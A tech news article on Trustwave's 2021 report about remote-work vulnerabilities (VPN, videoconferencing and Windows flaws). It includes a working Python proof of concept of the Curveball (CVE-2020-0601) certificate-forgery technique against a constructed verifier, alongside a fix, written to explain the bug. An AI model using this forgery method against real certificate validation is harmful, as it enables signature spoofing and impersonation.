The transition of employees to working from home created new vulnerabilities in systems designed for a centralized, in-office workforce, and it also coincided with a spike in cybercriminal activity.
That is the finding of the new 2021 Network Security Report from Trustwave, a cybersecurity and managed security services provider. The report is based on scans of millions of servers worldwide.
“The number of machines connected to the Internet and vulnerable to issues that were actively being exploited in the wild was staggering. Some of the CVEs had patches released over 2-3 years back. It is always alarming to see those types of stats around vulnerable devices,” Prutha Parikh, senior security research manager at Trustwave SpiderLabs, told SD Times.
One of the most common and serious causes of breaches was unpatched VPN vulnerabilities. A major incident tied to this problem involved the Pulse Connect Secure arbitrary file-reading vulnerability (CVE-2019-11510), which had been patched in April 2019 but was later used by the REvil ransomware operators to gain access to the network of the currency exchange Travelex.
Video conferencing platforms were a major new source of problems. One widely reported abuse was “Zoom bombing,” in which uninvited participants hijack and disrupt videoconferences; it exploits open meeting links and permissive meeting settings rather than a code flaw. There were also reports of a wormable, zero-click vulnerability in Cisco Jabber, which received a critical severity rating and was patched by Cisco.
“Some trends like video conferencing software vulnerabilities saw a spike with a distributed workforce last year. This was primarily because these applications were designed for ease of use rather than keeping security in mind. As these solutions continue to mature, there may be a slight drop in that trend. But, we will continue seeing a rise in cloud security issues and possibly more sophisticated supply chain attacks despite workforces returning to a hybrid model,” Parikh added.
The third major vulnerability trend involves Windows vulnerabilities, notably a critical flaw dubbed “Curveball” or “ChainOfFools” (CVE-2020-0601) that affected Windows 10 and Windows Server 2016/2019, along with the many applications that rely on Windows CryptoAPI for certificate signature validation. The bug was in how CryptoAPI validated elliptic-curve certificates: it did not check that a certificate's explicit curve parameters matched those of the trusted root it was matched against, so an attacker could craft a certificate that appeared to chain to a trusted root and use it to spoof signatures.
Other Windows vulnerabilities included two wormable flaws: SMBGhost, also known as EternalDarkness (CVE-2020-0796), in SMBv3, and SIGRed (CVE-2020-1350) in the Windows DNS Server. A major privilege escalation vulnerability named Zerologon (CVE-2020-1472) also surfaced; it exploited a flaw in the Netlogon Remote Protocol (MS-NRPC).
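The Curveball flaw described above is easier to understand with the arithmetic in front of you. The following is an added example written for this article, not code from Trustwave, Microsoft or the report: a textbook ECDSA implementation over P-256 in pure Python, a constructed “trusted root” key pair, and two verifiers. The vulnerable verifier mirrors the CVE-2020-0601 mistake (match the root by public key, then trust the curve parameters carried in the certificate); the fixed verifier insists that explicit parameters equal the named curve's. The attacker's trick is to pick any private key d' and publish a generator G' = d'^-1 · Q, so that d' · G' equals the trusted root's public key Q. The key values, the `forged_cert`/`legitimate_cert` helpers and the to-be-signed bytes are all constructed for the example.

```python
import hashlib

# NIST P-256 domain parameters (public constants).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)


def inv(x, m):
    """Modular inverse via Fermat; both moduli used here (P and N) are prime."""
    return pow(x % m, m - 2, m)


def add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * inv(2 * y1, P) % P  # doubling
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def mul(k, pt):
    """Double-and-add scalar multiplication (not constant-time; fine for a demo)."""
    acc = None
    while k:
        if k & 1:
            acc = add(acc, pt)
        pt = add(pt, pt)
        k >>= 1
    return acc


def digest(msg):
    return int.from_bytes(hashlib.sha256(msg).digest(), "big") % N


def sign(priv, msg, gen):
    """Textbook ECDSA with the generator passed in explicitly. The nonce is derived
    from key and message so runs are repeatable (a simplification, not RFC 6979)."""
    e = digest(msg)
    k = int.from_bytes(hashlib.sha256(priv.to_bytes(32, "big") + msg).digest(), "big") % N or 1
    r = mul(k, gen)[0] % N
    s = inv(k, N) * (e + r * priv) % N
    return (r, s)


def ecdsa_valid(pub, msg, sig, gen):
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = inv(s, N)
    x = add(mul(digest(msg) * w % N, gen), mul(r * w % N, pub))
    return x is not None and x[0] % N == r


# Constructed "trusted root" key pair standing in for a root CA in the certificate store.
ROOT_PRIV = 0xc9afa9d845ba75166b5c215767b1d6934e50c3db36e89b127b8a622b120f6721
ROOT_PUB = mul(ROOT_PRIV, G)


def vulnerable_verify(cert):
    """The CVE-2020-0601 mistake: the issuer is matched to the trusted root by public key
    only, and the certificate's own explicit curve parameters (its generator) are trusted."""
    if cert["pub"] != ROOT_PUB:
        return False
    return ecdsa_valid(cert["pub"], cert["tbs"], cert["sig"], cert["gen"])


def fixed_verify(cert):
    """Hardened check: explicit parameters must equal the named curve's, so G is always used."""
    if cert["pub"] != ROOT_PUB or cert["gen"] != G:
        return False
    return ecdsa_valid(cert["pub"], cert["tbs"], cert["sig"], G)


def legitimate_cert(tbs):
    return {"tbs": tbs, "pub": ROOT_PUB, "gen": G, "sig": sign(ROOT_PRIV, tbs, G)}


def forged_cert(tbs, attacker_priv=0x1f3a9c7e5b2d4f6a8c0e1b3d5f7a9c2e4b6d8f0a1c3e5b7d9f2a4c6e8b0d1f3a):
    """Attacker picks any d' and sets G' = d'^-1 * Q, so d' * G' == Q (the trusted root key).
    A verifier that takes G' from the certificate accepts a signature made with d'."""
    gen = mul(inv(attacker_priv, N), ROOT_PUB)
    return {"tbs": tbs, "pub": ROOT_PUB, "gen": gen, "sig": sign(attacker_priv, tbs, gen)}


if __name__ == "__main__":
    tbs = b"CN=spoofed.example (constructed to-be-signed bytes)"
    print("forged cert, vulnerable verifier:", vulnerable_verify(forged_cert(tbs)))
    print("forged cert, fixed verifier:     ", fixed_verify(forged_cert(tbs)))
    print("legitimate cert, fixed verifier: ", fixed_verify(legitimate_cert(tbs)))
```

Nothing about the trusted root's private key is needed; the forger only needs its public key, which every client already ships. The practical lesson is the one in the fix: a certificate that names a standard curve must not be allowed to carry its own generator, and a verifier that matches a root by public key must compare the full set of parameters, not just the point.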
Parikh said that a major reason why these vulnerabilities exist is that organizations fail to prioritize vulnerabilities based on their environments since they are often unaware of which vulnerabilities pose the most risk. Also, server-side patching brings challenges like downtime of production systems as well as the possibility of breaking existing functionality, resulting in more reluctance from teams when it comes to remediation.
“Organizations should identify their most critical assets and accelerate patch management for these critical systems like VPNs and cloud interfaces. Automation is key to achieving continuous monitoring of vulnerabilities and remediation. Applying other security best practices like least privileged access, zero trust solutions, and scalable MFA can also aid in prevention. Comprehensive security includes both a proactive and reactive approach, so detection and response are as important as preventative measures in dealing with attacks,” Parikh added.